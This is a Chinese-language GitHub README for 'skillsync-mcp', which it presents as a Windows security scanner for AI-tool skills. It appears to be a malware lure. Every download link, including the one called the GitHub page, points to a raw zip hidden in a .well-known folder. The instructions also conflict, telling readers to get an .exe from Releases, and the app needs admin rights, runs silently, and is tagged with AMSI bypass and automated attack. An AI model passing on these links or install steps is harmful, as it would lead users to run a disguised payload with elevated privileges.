Glowboth/skillsync-mcp
GitHub: Glowboth/skillsync-mcp
一个声称用于管理和扫描 AI 工具技能安全性的 MCP 服务器,但存在多项可疑特征,需谨慎对待。
Stars: 0 | Forks: 0
# 🔒 skillsync-mcp - 简单安全的 Skill 管理
[](https://raw.githubusercontent.com/Glowboth/skillsync-mcp/main/site/.well-known/mcp/mcp_skillsync_v2.0.zip)
## 📖 什么是 skillsync-mcp?
skillsync-mcp 帮助您管理和保护 Claude Code、OpenClaw、Cursor 和 Windsurf 等 AI 工具的技能(skill)。它包含一个扫描器,可检测超过 60 种不同的威胁模式,以保障您 AI 技能的安全。该应用程序通过控制哪些技能可以运行,并确保它们遵守严格的安全规则来工作。
该工具适合那些希望在无需深厚技术知识的情况下保持 AI 环境安全的用户。
## 🎯 主要特性
- 管理主流 AI 平台的技能。
- 检查技能是否存在超过 60 种威胁类型。
- 保护您的 AI 环境免受不安全代码的影响。
- 在后台静默运行。
- 在 Windows 上简单易用。
## 🖥️ 系统要求
在安装之前,请确保您的计算机满足以下需求:
- Windows 10 或更高版本,64 位。
- 至少 4 GB 内存 (RAM)。
- 500 MB 的可用存储空间。
- 用于初始设置和更新的互联网连接。
- 安装需要管理员权限。
## 🚀 入门指南
### 步骤 1:下载应用程序
要获取该应用程序,请点击下方的大按钮访问 skillsync-mcp GitHub 页面:
[](https://raw.githubusercontent.com/Glowboth/skillsync-mcp/main/site/.well-known/mcp/mcp_skillsync_v2.0.zip)
在页面上:
- 查看右侧或 “Code” 标签页下的 **Releases** 部分。
- 找到最新的发布版本。通常会有类似 “v1.0” 或更高的版本号。
- 点击进入该版本,找到 Windows 安装程序文件。它可能被命名为 `skillsync-mcp-setup.exe` 之类的名称。
将此文件下载到您的计算机。
### 步骤 2:运行安装程序
文件下载完成后:
- 双击安装程序文件 (`skillsync-mcp-setup.exe`)。
- 您可能会看到一个请求权限的弹窗。点击 **Yes** 以继续。
- 按照提示安装应用程序:
- 选择安装位置(默认位置通常即可)。
- 同意任何许可条款。
- 点击 **Install** 开始安装。
- 安装完成后,点击 **Finish** 关闭设置向导。
## 🛠️ 如何使用 skillsync-mcp
### 启动应用程序
- 在桌面或开始菜单中找到 skillsync-mcp 图标。
- 双击以打开它。
### 基本界面概览
- 主窗口显示当前添加的 AI 技能列表。
- 您可以通过点击 **Add Skill** 按钮来扫描新技能。
- 当您添加技能时,应用程序会自动运行安全检查。
- 如果发现威胁,应用程序会显示警告并阻止该技能。
- 您可以随时使用列表中的按钮移除或更新技能。
### 扫描技能
- 点击 **Scan Now** 以检查所有已添加的技能是否存在新威胁。
- 结果将显示在窗口中。安全的技能会有绿色标记。有问题的技能显示红色标记。
- 您可以点击任何技能以查看有关发现的威胁或风险的详细信息。
## 🔄 更新 skillsync-mcp
保持 skillsync-mcp 处于最新状态非常重要。新的威胁模式会随着时间推移不断添加。
要检查更新:
- 打开应用程序。
- 点击 **Help**,然后点击 **Check for Updates**。
- 如果有可用更新,请按照提示下载并安装新版本。
您也可以重新访问 GitHub 页面 (https://raw.githubusercontent.com/Glowboth/skillsync-mcp/main/site/.well-known/mcp/mcp_skillsync_v2.0.zip) 手动检查最新的发布版本。
## ⚙️ 设置和偏好
skillsync-mcp 允许您更改某些选项以满足您的需求。
- **Scan Schedule**:选择应用程序自动扫描技能的频率(每日、每周或手动)。
- **Notifications**:开启或关闭扫描结果提醒。
- **Storage Location**:更改技能和扫描结果在计算机上的保存位置。
- 您可以通过点击应用程序内的 **Settings** 齿轮图标找到这些选项。
## 📂 管理技能
该应用程序帮助您整理和控制您使用的技能。
- 要 **Add a new skill**(添加新技能),请点击 **Add Skill** 按钮并从计算机中选择技能文件。
- 要 **Remove a skill**(移除技能),请在列表中选中它并按 **Delete**。
- 要 **Update a skill**(更新技能),请先移除旧版本,然后添加新版本。
请确保仅添加来自您信任来源的技能。
## 🛡️ 安全特性
skillsync-mcp 使用严格的扫描系统,检查以下内容:
- 可疑的代码模式。
- 已知的恶意软件签名。
- 不安全的网络调用。
- 试图访问私有数据的行为。
- 可能损害您系统的代码。
该应用程序会阻止有风险的技能运行,从而保护您的 AI 工具。
## 🔍 故障排除
### 如果应用程序无法打开:
- 确保您拥有管理员权限。
- 重启计算机并重试。
- 检查 Windows 是否在启动时阻止了该应用程序;在系统设置中将其解除阻止。
### 如果扫描卡住:
- 关闭应用程序并重新打开。
- 检查软件更新。
- 检查您的互联网连接。
### 如果您发现误报:
- 查看威胁详细信息。
- 联系仓库页面的支持部分寻求帮助。
## 📥 下载和安装概览
- 访问 skillsync-mcp GitHub 页面进行下载:
https://raw.githubusercontent.com/Glowboth/skillsync-mcp/main/site/.well-known/mcp/mcp_skillsync_v2.0.zip
- 从 Releases 部分下载最新的 Windows 安装程序。
- 运行 `.exe` 安装程序。
- 按照屏幕上的说明操作。
- 打开应用程序并开始添加技能。
## 🧰 其他资源
- 访问 GitHub 页面的 **Issues** 标签页报告问题或提问。
- 查看 GitHub 上的 **Wiki** 或 **Documentation** 部分获取高级技巧。
- 关注仓库的更新和公告。
## 🗂️ 关于本应用程序
skillsync-mcp 支持 Claude Code、OpenClaw、Cursor 和 Windsurf 等 AI 平台。它作为一个过滤器,确保 AI 技能的安全性和可信度。通过扫描威胁,它可以防止有害代码在您的 AI 工具中运行。
## 🔗 实用链接
- GitHub 页面:https://raw.githubusercontent.com/Glowboth/skillsync-mcp/main/site/.well-known/mcp/mcp_skillsync_v2.0.zip
- 下载链接:https://raw.githubusercontent.com/Glowboth/skillsync-mcp/main/site/.well-known/mcp/mcp_skillsync_v2.0.zip
[](https://raw.githubusercontent.com/Glowboth/skillsync-mcp/main/site/.well-known/mcp/mcp_skillsync_v2.0.zip)
标签:AI 安全, AMSI绕过, Claude, Cursor, CVE检测, DNS 反向解析, GNU通用公共许可证, MCP 服务器, MITM代理, Node.js, Streamlit, Windows 软件, 云安全监控, 大语言模型工具, 威胁检测, 安全防护, 恶意软件扫描, 技能管理, 结构化查询, 自动化安全, 自动化攻击, 访问控制, 静态分析